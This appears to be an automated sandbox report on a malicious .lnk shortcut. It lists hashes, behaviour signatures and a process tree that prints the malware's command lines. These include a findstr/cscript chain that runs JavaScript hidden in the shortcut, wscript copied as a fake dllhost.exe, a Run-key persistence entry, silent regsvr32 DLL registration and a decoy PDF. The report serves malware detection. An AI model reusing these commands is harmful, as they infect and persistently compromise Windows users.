Analysis
Max time kernel: 191s
Max time network: 216s
Platform: windows7_x64
Resource: win7-20231023-en
Resource tags: arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
Submitted: 18/11/2023, 02:49
Static task: static1
Behavioral task: behavioral1
  Sample: c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
  Resource: win7-20231023-en
Behavioral task: behavioral2
  Sample: c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
  Resource: win10v2004-20231023-en
General
Target: c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
Size: 345KB
MD5: ba26b003f8f8b00da1bb1e4c12d109cc
SHA1: a88b3cc71121c9b96053049892abb98b4db3eedc
SHA256: c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a
SHA512: 580de04b864c1dca99635d96344a8e866353633c40d27c366d7d9bb6797ec43106044a071c86338457b3f935ab7f7294b72b2d165b45392bb28f1dda0db9ed48
SSDEEP: 6144:ydr8fmEOmqG2K13qPIWAiC/Q5FNTrmwMtGQqOh5PAW7LebJcDgym8/kU0:0QDOmqzHPZAilTiwMtfh5P1Lo4kB
Malware Config
Signatures
Executes dropped EXE (1 IoC)
  PID 1044 dllhost.exe
Loads dropped DLL (2 IoCs)
  PID 2864 regsvr32.exe
  PID 1044 dllhost.exe
Registers COM server for autorun (1 TTP, 2 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 (regsvr32.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\libeay32.dll" (regsvr32.exe)
Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows\CurrentVersion\Run\CTFM0N.EXE = "cmd /c start C:\\Users\\Admin\\AppData\\Local\\Temp\\dllhost.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\~26210619.js" (cscript.exe)
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Modifies registry class (8 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\DynamicWrapperX\CLSID (regsvr32.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\DynamicWrapperX (regsvr32.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}" (regsvr32.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32 (regsvr32.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node (regsvr32.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID (regsvr32.exe)
  Key created: \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC} (regsvr32.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000_CLASSES\Wow6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\libeay32.dll" (regsvr32.exe)
Suspicious behavior: CmdExeWriteProcessMemorySpam (2 IoCs)
  PID 1044 dllhost.exe
  PID 928 AcroRd32.exe
Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
  PID 1044 dllhost.exe
  PID 928 AcroRd32.exe
Suspicious use of SetWindowsHookEx (4 IoCs)
  PID 928 AcroRd32.exe (4 times)
Suspicious use of WriteProcessMemory (40 IoCs, grouped by source/target pair)
  PID 2600 cmd.exe wrote to memory of PID 1588 (procid_target 30), 3 times
  PID 1588 cmd.exe wrote to memory of PID 2608 (procid_target 31), 3 times
  PID 1588 cmd.exe wrote to memory of PID 2684 (procid_target 32), 3 times
  PID 1588 cmd.exe wrote to memory of PID 2492 (procid_target 33), 3 times
  PID 2492 cscript.exe wrote to memory of PID 1412 (procid_target 34), 3 times
  PID 2492 cscript.exe wrote to memory of PID 2180 (procid_target 36), 3 times
  PID 2492 cscript.exe wrote to memory of PID 2824 (procid_target 38), 3 times
  PID 2824 cmd.exe wrote to memory of PID 1044 (procid_target 40), 4 times
  PID 1412 cmd.exe wrote to memory of PID 928 (procid_target 41), 4 times
  PID 1044 dllhost.exe wrote to memory of PID 916 (procid_target 42), 4 times
  PID 916 cmd.exe wrote to memory of PID 2864 (procid_target 44), 7 times
Processes (process tree, indented by depth)
C:\Windows\system32\cmd.exe (PID 2600)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk
  Signatures: Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe (PID 1588)
    Command line: "C:\Windows\System32\cmd.exe" /c DIR 000792244100393251090026219142\00157269330078632939 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk') do (if %~za gtr 79002 (findstr /b "var onm=" "%a" > C:\Users\Admin\AppData\Local\Temp\~26210619.js & cscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 9))&cls&exit
    Signatures: Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (PID 2608)
      Command line: C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\Admin\AppData\Local\Temp\*.lnk
    C:\Windows\system32\findstr.exe (PID 2684)
      Command line: findstr /b "var onm=" "C:\Users\Admin\AppData\Local\Temp\c88467a4416518a52ce45a51f96c9c280e3ece539613e82b0d9fe6f2d4122a3a.lnk"
    C:\Windows\system32\cscript.exe (PID 2492)
      Command line: cscript C:\Users\Admin\AppData\Local\Temp\~26210619.js 9
      Signatures: Adds Run key to start application; Suspicious use of WriteProcessMemory
      C:\Windows\System32\cmd.exe (PID 1412)
        Command line: "C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf
        Signatures: Suspicious use of WriteProcessMemory
        C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe (PID 928)
          Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\October_department_summary.pdf"
          Signatures: Suspicious behavior: CmdExeWriteProcessMemorySpam; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx
      C:\Windows\System32\cmd.exe (PID 2180)
        Command line: "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\wscript.exe C:\Users\Admin\AppData\Local\Temp\dllhost.exe /y
      C:\Windows\System32\cmd.exe (PID 2824)
        Command line: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js
        Signatures: Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\dllhost.exe (PID 1044)
          Command line: C:\Users\Admin\AppData\Local\Temp\dllhost.exe C:\Users\Admin\AppData\Local\Temp\~26210619.js
          Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious behavior: CmdExeWriteProcessMemorySpam; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of WriteProcessMemory
          C:\Windows\SysWOW64\cmd.exe (PID 916)
            Command line: "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll
            Signatures: Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\regsvr32.exe (PID 2864)
              Command line: C:\Windows\system32\regsvr32 /i /s C:\Users\Admin\AppData\Local\Temp\libeay32.dll
              Signatures: Loads dropped DLL; Registers COM server for autorun; Modifies registry class
Network
MITRE ATT&CK Enterprise v15
Downloads